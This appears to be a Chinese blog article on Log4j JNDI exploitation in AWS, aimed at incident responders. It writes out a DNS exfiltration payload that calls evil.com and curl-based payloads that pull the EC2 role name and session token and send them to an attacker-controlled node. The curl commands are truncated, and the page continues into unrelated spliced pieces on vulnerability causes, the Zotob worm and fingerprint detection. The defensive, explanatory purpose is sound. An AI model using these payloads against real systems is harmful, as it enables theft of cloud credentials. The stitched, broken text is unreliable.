写在前面的话-Log4j对云环境意味着什么?
就在不久之前,Log4J java库被爆出了一个关键安全漏洞,该漏洞一经曝光,很多安全专家和技术人员都不得不加班加点去解决这个安全漏洞所带来的影响。Log4J JNDI漏洞与其说是单个漏洞,不如说是一个通过远程代码执行发起攻击的平台。
到目前为止,根据我们收集到的信息来看,各大厂商的安全事件响应人员、安全分析人员和技术工程师们主要都在通过以下快速响应步骤进行漏洞的缓解工作:
1、识别受影响的系统并推出发布程序;
2、迅速修复凭证安全问题;
3、寻找入侵威胁指标IoC;
那么在这篇文章中,我们将主要针对时间响应过程中的第三步步骤,即寻找入侵威胁指标IoC来进行介绍,并跟大家讨论Log4J库的潜在受攻击风险,尤其是在公共云环境中部署时可能会遇到的安全风险。
网络攻击者是如何利用Log4J漏洞的?
Log4J从根本上说是一个注入漏洞,并且可以有两种途径来利用该漏洞对目标系统执行攻击:
1、通过外部Java类文件实现远程代码执行
首先,Log4J日志记录框架中存在注入漏洞,因此有可能引发目标 服务器 向远程服务器发出http请求,而此时的目标服务器则会希望从远程服务器获得返回的Java类文件。
其次,当攻击者能够控制远程外部服务器时,他们就能够控制响应中返回给目标服务器的内容。在这种场景下,攻击者就可以将任意代码嵌入在Java类文件中,然后返回给目标服务器,并在目标服务器上得到执行。
2、通过DNS查询实现数据提取
由于Log4J中存在注入漏洞,将导致目标服务器可以向外部服务器进行出站查询。当攻击者能够控制外部服务器的主机名时,就会造成环境变量值发生泄漏。
样例如下:
${jndi:ldap://${uname}.${AWS_PROFILE}.evil.com:3489/a}下图显示的是攻击者发动Log4J JNDI攻击的大致流程图:
Log4J漏洞对云环境部署有何独特影响?
根据研究人员的分析发现,如果目标系统上部署有一个易受攻击(即存在漏洞)的Log4J库时,攻击者就能够通过DNS查询机制并利用数据提取技术来检索目标系统上的任何环境变量值。比如说,在很多攻击活动中,我们就发现攻击者会利用这种技术从AWS环境中提取特定的AWS配置变量和相关数据。
但是,在环境变量中设置敏感信息很明显是一种糟糕的做法,这种场景也不太可能发生在AWS最大的攻击面-EC2实例上。
AWS特定的环境变量可能会设置在终端节点上,也就是终端用户配置awscli的工作站上,或者也有可能在运行时预先配置变量“AWS_ACCESS_KEY_ID”、“AWS_SECRET_ACCESS_KEY”和“AWS_session_TOKEN”的lambda函数中。
因此,AWS特定的环境变量就不太可能在EC2实例中找到了。相反,在AWS EC2实例上运行的应用程序将使用分配给EC2实例的EC2实例配置文件的临时凭证数据。这些临时凭证数据由称为实例元数据服务(IMDS)的内部HTTP节点颁发。因此,我们可以使用Log4J漏洞从EC2实例中提取这些凭证数据。
使用远程代码执行提取实例元数据凭证
通过利用Log4J漏洞,网络攻击者可以尝试从C2实例中提取临时会话凭证,并对目标AWS资源采取进一步的攻击行动。在下面的例子中,我们将演示Payload可能的攻击路径:
第一步:注入JNDI Payload,让目标EC2查询内部实例元数据API,并获取EC2运行时使用的IAM角色,然后将角色名称保存到文件中并返回给攻击者控制的节点。
第一个发送给运行IMDSv1的EC2实例的Payload:
/bin/sh -c 'cd /tmp && curl>> /tmp/role && curl -d $(cat /tmp/role)第二步:拿到角色名称之后,注入另一个JNDI Payload,并控制目标EC2查询内部元数据API以获取一个临时会话令牌,将令牌保存为文件之后,将文件的内容返回给攻击者控制的节点。
第二个发送给运行IMDSv1的EC2实例的Payload:
/bin/sh -c 'cd /tmp && curl>> /tmp/token && curl -d @/tmp/token --http1.0第三步:向目标EC2发送最后一个Payload,并控制其删除之前两步注入操作中创建的临时文件。
提取的会话令牌的默认TTL为1小时。攻击者可以利用这段时间对AWS资源采取行动,就好像它们是EC2实例一样,甚至可能执行持久性技术,如创建新用户或角色,具体的影响完全取决于分配给EC2实例的权限。
另一种通过Log4J提取IMDS证书的方法
从EC2实例上的实例元数据服务中提取凭据的潜在方法多种多样,攻击者可以利用各种Payload并通过使用HTTP查询内部服务以检索凭据。Payload可以通过如上所述的两个步骤来传递,或者浓缩成一个步骤。可以传递一个Payload,让这个Payload存储实例元数据服务对环境变量的响应,其中环境变量的值是通过辅助JNDI注入提取的。在所有可能的变体中,唯一一致的一个步骤是必须向EC2实例上运行的实例元数据服务发出HTTP请求。
总结
攻击EC2实例元数据API并不新颖,云安全研究人员也一直在描述和介绍针对这种服务的滥用行为。这不是一个“新错误”,而是Log4J漏洞对云计算影响的新表述。虽然这篇文章专门针对针对AWS环境的威胁,但所有相同的原则在任何GCP或Azure环境中都适用。
参考链接
为什么会有漏洞?
漏洞的原因一般有以下几个方面.1 编程人员的素质或技术问题而留下的隐患.2 软件在设计之处考虑到将来维护而设置的后门.就象RPC传输协议中存在不检查数据长度而引发的缓冲区溢出漏洞.如果被不法分子成功利用此漏洞将获得超级管理员权限.可以在系统任意添删文件和执行任意代码.3 象2003年流行的蠕虫王病毒利用的就是微软系统的漏洞.从最底层发起攻击.IIS服务存在匿名登陆的错误.病毒和木马对黑客来说一向都是交叉使用.分不开的.利用木马也就是后门程序来接受来自主攻端的指令.再运行自行写好的特定程序.也就是病毒来影响被攻击的用户.
电脑出现图片上的问题应该怎么办
中了蠕虫病毒。
专杀工具病毒利用了8月9日微软发布的即插即用中的漏洞(MS05-039),在微软发布安全公告后短短的5天之内即出现该蠕虫,表明病毒作者利用漏洞的能力越来越强。
用户电脑感染了该病毒之后,在某些情况下会出现系统频繁重启的现象。
同时,该病毒会在用户电脑上开设后门,方便黑客对其进行远程控制。
该病毒典型症状:系统处理程序c:\Windows\system32\意外中止,系统将关机并重启! 离关机还有*妙!一、病毒评估1.病毒英文2.病毒类型:蠕虫病毒3.病毒危险等级:★★★☆4.病毒传播途径:网络5.病毒依赖系统:WIN 2000/XP/2003二、病毒破坏1.造成系统频繁重启当病毒攻击失败的时候,会造成系统频繁重启。
病毒攻击目标系统时,可能造成系统不断重启(如图示),与震荡波、冲击波发作的时候类似,只不过在Zotob影响的进程变了,变为系统关键进程“”2、给系统开设后门3、修改系统文件,使用户的杀毒软件不能升级。
三、技术分析一旦执行,病毒将执行以下操作:1. 病毒启动后,会将自己复制到系统目录中,病毒文件名为“”。
2、在注册表中添加下列启动项:HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\RunWINDOWS SYSTEM = _LOCAL_MACHINE\Software\Microsoft\Windows\Currentversion\RunServicesWINDOWS SYSTEM = ;3、在感染的时候,病毒利用IP扫描的方式在网络中寻找具有漏洞的系统,发现后就会对系统进行攻击,连接系统的445端口,并植入系统中一个远程shell,此远程SHELL释放一个文件 ,此文件中包含有一段FTP命令脚本,功能是利用FTP从远程将病毒文件下载到本地。
4、如果攻击失败,则造成系统重启阻击波病毒预防完全处理办法:1.安装防病毒软件,开启实时升级最快速度升级最新病毒库防止该病毒的入侵和完全查杀该病毒2:使用个人网防火墙封着系统默认打开的TCP 445端口,切断病毒入侵的途径3:安装操作系统补丁... letin/
列举出五种指纹检测的方法?
一、碘蒸气法:用碘蒸气熏,由于碘能溶解在指纹印上的油脂之中,而能显示指纹。
这种方法能检测出数月之前的指纹。
二、硝酸银溶液法:向指纹印上喷硝酸银溶液,指纹印上的氯化钠就会转化成氯化银不溶物。
经过曰光照射,氯化银分解出银细粒,就会象照相馆片那样显示棕黑色的指纹,这是刑侦中常用方法。
这种方法可检测出更长时间之前的指纹。
三、有机显色法:因指纹印中含有多种氨基酸成份,因此采用一种叫二氢茆三酮的试剂,利用它跟氨基酸反应产生紫色物质,就能检测出指纹。
这种方法可检出一、二年前的指纹。
四、 激光检测法:用激光照射指纹印显示出指纹。
这种方法可检测出长达五年前的指纹
发表评论